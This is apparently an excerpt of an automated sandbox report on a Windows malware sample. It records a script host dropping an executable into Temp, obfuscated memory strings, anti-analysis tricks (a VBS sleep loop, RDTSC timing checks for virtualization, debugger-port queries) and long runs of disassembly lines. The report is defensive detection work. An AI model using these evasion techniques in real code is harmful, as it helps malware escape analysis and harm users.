Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030C07B8 push FFFFFFF6h; ret	7_2_030C07C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030C74CD push esp; retf	7_2_030C74D1
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030CBFC7 push eax; iretd	7_2_030CBFCC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030C4FF9 push 00000065h; retf	7_2_030C500E

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	File created: C:\Users\user\AppData\Local\Temp\nsx8568.tmp\System.dll			Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Potential evasive VBS script found (sleep loop)

Source: Initial file

Initial file: Do While Timer < startTime + (duration / 1000) WScript.Sleep 100

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	API/Special instruction interceptor: Address: 3E23E4E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	API/Special instruction interceptor: Address: 2663E4E

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	RDTSC instruction interceptor: First address: 3DE0F70 second address: 3DE0F70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F920875D237h 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F920875D1DCh 0x00000008 test cx, ax 0x0000000b inc ebp 0x0000000c cmp ecx, eax 0x0000000e inc ebx 0x0000000f cmp ebx, eax 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	RDTSC instruction interceptor: First address: 2620F70 second address: 2620F70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9208E85AE7h 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F9208E85A8Ch 0x00000008 test cx, ax 0x0000000b inc ebp 0x0000000c cmp ecx, eax 0x0000000e inc ebx 0x0000000f cmp ebx, eax 0x00000011 rdtsc

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Code function: 5_2_3555D1C0 rdtsc

5_2_3555D1C0

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx8568.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	API coverage: 0.2 %
Source: C:\Windows\SysWOW64\verclsid.exe	API coverage: 1.9 %

Source: C:\Windows\SysWOW64\verclsid.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 2_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		2_2_0040596D
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 2_2_004065A2 FindFirstFileW,FindClose,		2_2_004065A2

Source: wscript.exe, 00000000.00000003.2095135380.00000164741A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089387539.00000164740CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093685792.000001647416F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094494965.00000164741A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090149625.000001647410B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095198940.00000164741AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2091360769.000001647412A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088690857.00000164740B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088284298.00000164740A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2091546840.0000016474160000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2091013908.0000016474119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vrkKzc4i68cypoeQZSwF))Dvzt&&&...a562UmhX+XFfKym))29ISFPOC))9gmDUu+YH12KPspe3zrm&&&Y1R0&&&wuUM+bL+LYc9/xvdetb...&&&vIscHtRaipyl2EYwb71KP+GMES905EIjR...aqN4e12z))oopjkR2ctzxjg3YPo8Wqp7ae3...19Hzlnn1zzv8ui1GMvyHl3Fg@@WvUX52+39HGFS2hN@@5x&&&GyhCn7P8Cpa8R7nswuLd))seHmY4kvoKeLl5cra2yoxQxvn...uHUwmza
Source: wscript.exe, 00000000.00000003.2110645304.0000016474096000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108784911.0000016474092000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110109326.0000016474094000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oopjkR2ctzxjg3YPo8Wqp7ae3...19Hzlnn1zzv8ui1GMvyHl3Fg@@WvUX52+39HGFS2hN@@5x&&&GyhCn7P8Cpa8R7nswuLdijn
Source: wscript.exe, 00000000.00000003.2105038674.0000016474830000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108180755.0000016474847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101361979.0000016474829000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106970269.0000016474844000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099122019.000001647481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oopjkR2ctzxjg3YPo8Wqp7ae3...19Hzlnn1zzv8ui1GMvyHl3Fg@@WvUX52+39HGFS2hN@@5x&&&GyhCn7P8Cpa8R7nswuLd

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	API call chain: ExitProcess graph end node			graph_2-2235
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	API call chain: ExitProcess graph end node			graph_2-2444

Source: C:\Windows\SysWOW64\verclsid.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\verclsid.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Code function: 5_2_3555D1C0 rdtsc

5_2_3555D1C0

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Code function: 5_2_355235C0 NtCreateMutant,LdrInitializeThunk,

5_2_355235C0

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

2_2_10001B18

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E8550 mov eax, dword ptr fs:[00000030h]	5_2_354E8550
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E8550 mov eax, dword ptr fs:[00000030h]	5_2_354E8550
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551B570 mov eax, dword ptr fs:[00000030h]	5_2_3551B570
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551B570 mov eax, dword ptr fs:[00000030h]	5_2_3551B570
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DB562 mov eax, dword ptr fs:[00000030h]	5_2_354DB562
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551656A mov eax, dword ptr fs:[00000030h]	5_2_3551656A
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551656A mov eax, dword ptr fs:[00000030h]	5_2_3551656A
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551656A mov eax, dword ptr fs:[00000030h]	5_2_3551656A
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35517505 mov eax, dword ptr fs:[00000030h]	5_2_35517505
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35517505 mov ecx, dword ptr fs:[00000030h]	5_2_35517505
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B4500 mov eax, dword ptr fs:[00000030h]	5_2_355B4500
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B4500 mov eax, dword ptr fs:[00000030h]	5_2_355B4500
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B4500 mov eax, dword ptr fs:[00000030h]	5_2_355B4500
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B4500 mov eax, dword ptr fs:[00000030h]	5_2_355B4500
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B4500 mov eax, dword ptr fs:[00000030h]	5_2_355B4500
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B4500 mov eax, dword ptr fs:[00000030h]	5_2_355B4500
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B4500 mov eax, dword ptr fs:[00000030h]	5_2_355B4500
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551D530 mov eax, dword ptr fs:[00000030h]	5_2_3551D530
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551D530 mov eax, dword ptr fs:[00000030h]	5_2_3551D530
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B5537 mov eax, dword ptr fs:[00000030h]	5_2_355B5537
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E53E mov eax, dword ptr fs:[00000030h]	5_2_3550E53E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E53E mov eax, dword ptr fs:[00000030h]	5_2_3550E53E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E53E mov eax, dword ptr fs:[00000030h]	5_2_3550E53E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E53E mov eax, dword ptr fs:[00000030h]	5_2_3550E53E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E53E mov eax, dword ptr fs:[00000030h]	5_2_3550E53E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3559B52F mov eax, dword ptr fs:[00000030h]	5_2_3559B52F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0535 mov eax, dword ptr fs:[00000030h]	5_2_354F0535
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0535 mov eax, dword ptr fs:[00000030h]	5_2_354F0535
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0535 mov eax, dword ptr fs:[00000030h]	5_2_354F0535
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0535 mov eax, dword ptr fs:[00000030h]	5_2_354F0535
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0535 mov eax, dword ptr fs:[00000030h]	5_2_354F0535
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0535 mov eax, dword ptr fs:[00000030h]	5_2_354F0535
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354ED534 mov eax, dword ptr fs:[00000030h]	5_2_354ED534
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354ED534 mov eax, dword ptr fs:[00000030h]	5_2_354ED534
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354ED534 mov eax, dword ptr fs:[00000030h]	5_2_354ED534
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354ED534 mov eax, dword ptr fs:[00000030h]	5_2_354ED534
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354ED534 mov eax, dword ptr fs:[00000030h]	5_2_354ED534
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354ED534 mov eax, dword ptr fs:[00000030h]	5_2_354ED534
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558F525 mov eax, dword ptr fs:[00000030h]	5_2_3558F525
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558F525 mov eax, dword ptr fs:[00000030h]	5_2_3558F525
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558F525 mov eax, dword ptr fs:[00000030h]	5_2_3558F525
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558F525 mov eax, dword ptr fs:[00000030h]	5_2_3558F525
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558F525 mov eax, dword ptr fs:[00000030h]	5_2_3558F525
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558F525 mov eax, dword ptr fs:[00000030h]	5_2_3558F525
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558F525 mov eax, dword ptr fs:[00000030h]	5_2_3558F525
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551A5D0 mov eax, dword ptr fs:[00000030h]	5_2_3551A5D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551A5D0 mov eax, dword ptr fs:[00000030h]	5_2_3551A5D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555D5D0 mov eax, dword ptr fs:[00000030h]	5_2_3555D5D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555D5D0 mov ecx, dword ptr fs:[00000030h]	5_2_3555D5D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355095DA mov eax, dword ptr fs:[00000030h]	5_2_355095DA
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B35D7 mov eax, dword ptr fs:[00000030h]	5_2_355B35D7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B35D7 mov eax, dword ptr fs:[00000030h]	5_2_355B35D7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B35D7 mov eax, dword ptr fs:[00000030h]	5_2_355B35D7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355155C0 mov eax, dword ptr fs:[00000030h]	5_2_355155C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B55C9 mov eax, dword ptr fs:[00000030h]	5_2_355B55C9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E5CF mov eax, dword ptr fs:[00000030h]	5_2_3551E5CF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E5CF mov eax, dword ptr fs:[00000030h]	5_2_3551E5CF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E65D0 mov eax, dword ptr fs:[00000030h]	5_2_354E65D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015F4 mov eax, dword ptr fs:[00000030h]	5_2_355015F4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015F4 mov eax, dword ptr fs:[00000030h]	5_2_355015F4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015F4 mov eax, dword ptr fs:[00000030h]	5_2_355015F4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015F4 mov eax, dword ptr fs:[00000030h]	5_2_355015F4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015F4 mov eax, dword ptr fs:[00000030h]	5_2_355015F4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015F4 mov eax, dword ptr fs:[00000030h]	5_2_355015F4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E25E0 mov eax, dword ptr fs:[00000030h]	5_2_354E25E0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E5E7 mov eax, dword ptr fs:[00000030h]	5_2_3550E5E7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E5E7 mov eax, dword ptr fs:[00000030h]	5_2_3550E5E7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E5E7 mov eax, dword ptr fs:[00000030h]	5_2_3550E5E7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E5E7 mov eax, dword ptr fs:[00000030h]	5_2_3550E5E7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E5E7 mov eax, dword ptr fs:[00000030h]	5_2_3550E5E7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E5E7 mov eax, dword ptr fs:[00000030h]	5_2_3550E5E7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E5E7 mov eax, dword ptr fs:[00000030h]	5_2_3550E5E7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550E5E7 mov eax, dword ptr fs:[00000030h]	5_2_3550E5E7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551C5ED mov eax, dword ptr fs:[00000030h]	5_2_3551C5ED
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551C5ED mov eax, dword ptr fs:[00000030h]	5_2_3551C5ED
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354D758F mov eax, dword ptr fs:[00000030h]	5_2_354D758F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354D758F mov eax, dword ptr fs:[00000030h]	5_2_354D758F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354D758F mov eax, dword ptr fs:[00000030h]	5_2_354D758F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556B594 mov eax, dword ptr fs:[00000030h]	5_2_3556B594
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556B594 mov eax, dword ptr fs:[00000030h]	5_2_3556B594
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E2582 mov eax, dword ptr fs:[00000030h]	5_2_354E2582
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E2582 mov ecx, dword ptr fs:[00000030h]	5_2_354E2582
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E59C mov eax, dword ptr fs:[00000030h]	5_2_3551E59C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35514588 mov eax, dword ptr fs:[00000030h]	5_2_35514588
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550F5B0 mov eax, dword ptr fs:[00000030h]	5_2_3550F5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355045B1 mov eax, dword ptr fs:[00000030h]	5_2_355045B1
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355045B1 mov eax, dword ptr fs:[00000030h]	5_2_355045B1
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3559F5BE mov eax, dword ptr fs:[00000030h]	5_2_3559F5BE
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355735BA mov eax, dword ptr fs:[00000030h]	5_2_355735BA
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355735BA mov eax, dword ptr fs:[00000030h]	5_2_355735BA
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355735BA mov eax, dword ptr fs:[00000030h]	5_2_355735BA
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355735BA mov eax, dword ptr fs:[00000030h]	5_2_355735BA
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355605A7 mov eax, dword ptr fs:[00000030h]	5_2_355605A7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355605A7 mov eax, dword ptr fs:[00000030h]	5_2_355605A7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355605A7 mov eax, dword ptr fs:[00000030h]	5_2_355605A7
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015A9 mov eax, dword ptr fs:[00000030h]	5_2_355015A9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015A9 mov eax, dword ptr fs:[00000030h]	5_2_355015A9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015A9 mov eax, dword ptr fs:[00000030h]	5_2_355015A9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015A9 mov eax, dword ptr fs:[00000030h]	5_2_355015A9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355015A9 mov eax, dword ptr fs:[00000030h]	5_2_355015A9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3559F453 mov eax, dword ptr fs:[00000030h]	5_2_3559F453
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550245A mov eax, dword ptr fs:[00000030h]	5_2_3550245A
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EB440 mov eax, dword ptr fs:[00000030h]	5_2_354EB440
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EB440 mov eax, dword ptr fs:[00000030h]	5_2_354EB440
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EB440 mov eax, dword ptr fs:[00000030h]	5_2_354EB440
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EB440 mov eax, dword ptr fs:[00000030h]	5_2_354EB440
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EB440 mov eax, dword ptr fs:[00000030h]	5_2_354EB440
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EB440 mov eax, dword ptr fs:[00000030h]	5_2_354EB440
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E443 mov eax, dword ptr fs:[00000030h]	5_2_3551E443
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E443 mov eax, dword ptr fs:[00000030h]	5_2_3551E443
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E443 mov eax, dword ptr fs:[00000030h]	5_2_3551E443
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E443 mov eax, dword ptr fs:[00000030h]	5_2_3551E443
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E443 mov eax, dword ptr fs:[00000030h]	5_2_3551E443
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E443 mov eax, dword ptr fs:[00000030h]	5_2_3551E443
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E443 mov eax, dword ptr fs:[00000030h]	5_2_3551E443
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551E443 mov eax, dword ptr fs:[00000030h]	5_2_3551E443
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550A470 mov eax, dword ptr fs:[00000030h]	5_2_3550A470
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550A470 mov eax, dword ptr fs:[00000030h]	5_2_3550A470
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550A470 mov eax, dword ptr fs:[00000030h]	5_2_3550A470
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B547F mov eax, dword ptr fs:[00000030h]	5_2_355B547F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E1460 mov eax, dword ptr fs:[00000030h]	5_2_354E1460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E1460 mov eax, dword ptr fs:[00000030h]	5_2_354E1460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E1460 mov eax, dword ptr fs:[00000030h]	5_2_354E1460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E1460 mov eax, dword ptr fs:[00000030h]	5_2_354E1460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E1460 mov eax, dword ptr fs:[00000030h]	5_2_354E1460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FF460 mov eax, dword ptr fs:[00000030h]	5_2_354FF460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FF460 mov eax, dword ptr fs:[00000030h]	5_2_354FF460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FF460 mov eax, dword ptr fs:[00000030h]	5_2_354FF460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FF460 mov eax, dword ptr fs:[00000030h]	5_2_354FF460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FF460 mov eax, dword ptr fs:[00000030h]	5_2_354FF460
